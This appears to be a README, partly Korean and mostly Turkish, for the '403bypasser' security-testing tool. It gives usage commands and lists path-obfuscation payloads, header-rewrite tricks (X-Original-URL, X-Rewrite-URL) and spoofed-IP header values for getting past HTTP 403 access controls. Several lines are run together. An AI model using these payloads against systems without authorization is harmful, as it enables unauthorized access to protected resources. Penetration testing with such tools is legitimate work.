
헤더 조작, 경로 난독화 및 HTTP 메서드 변환을 사용하여 웹 애플리케이션 보안 테스트를 위한 HTTP 403 접근 제어 우회 기술을 자동화합니다.

403bypasser, hedef sayfalardaki erişim kontrolü kısıtlamalarını aşmak için kullanılan teknikleri otomatikleştirir. Bu araç geliştirilmeye devam edecektir, katkılara açıktır.
403bypasser hedef sayfalardaki erişim kontrolü kısıtlamalarını aşmak için kullanılan teknikleri otomatikleştirir. 403bypasser geliştirilmeye devam edecek olup katkılara açıktır.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txt komutunu çalıştırarak yükleyin.Argümanlar:
| Argüman | Açıklama | Örnekler | Not |
|---|---|---|---|
| -u | Tarama yapılacak tek URL | http://example.com veya http://example.com/ | Bu örnek kullanımların tümü aynı şekilde yorumlanır |
| -U | URL listesinin yolu | ./urllist.txt, ../../urllist.txt, vb. | Sadece dosyanın bulunduğu yolu belirtin :) |
| -d | Tarama yapılacak tek dizin | admin veya /admin veya admin/ veya /admin/ | Bu örnek kullanımların tümü aynı şekilde yorumlanır |
| -D | Dizin listesinin yolu | ./dirlist.txt, ../../dirlist.txt, vb. | Sadece dosyanın bulunduğu yolu belirtin :) |
Kullanım 1: python3 403bypasser.py -u https://example.com -d /secret
Kullanım 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Kullanım 3: python3 403bypasser.py -U urllist.txt -d /secret
Kullanım 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
ÖNEMLİ NOT: Aşağıdakilerin tümü aynı şekilde yorumlanır. Bu nedenle hangi deseni kullandığınız sadece bir tercih meselesidir.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretPython platformlar arası bir dil olduğu için bu program farklı işletim sistemlerinde çalıştırılabilir.
Programın çıktısı (geçerli dizinde) girdi olarak verilen alan adının adıyla bir dosyaya kaydedilir.
Örneğin:
python3 403bypasser.py -u https://example.com -d /secret komutu verilir. Ardından çıktı geçerli dizindeki example.txt dosyasına kaydedilir.
v2.0'daki Değişiklikler: Bu sürümde önemli değişiklikler yapıldı. Proje tamamen Bash'ten Python 3'e taşındı. Yeni ve çeşitli teknikler eklendi.
v1.1'deki Değişiklikler: Artık 403bypasser'a argümanlar aracılığıyla dosyalar (listeler) girdi olarak aktarılabilir. Ayrıca iki test durumu daha eklendi:
X-Original-URL ve 2) X-Rewrite-URL başlıkları ile zehirleme./%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretBaşlıklar:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPDeğerler:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1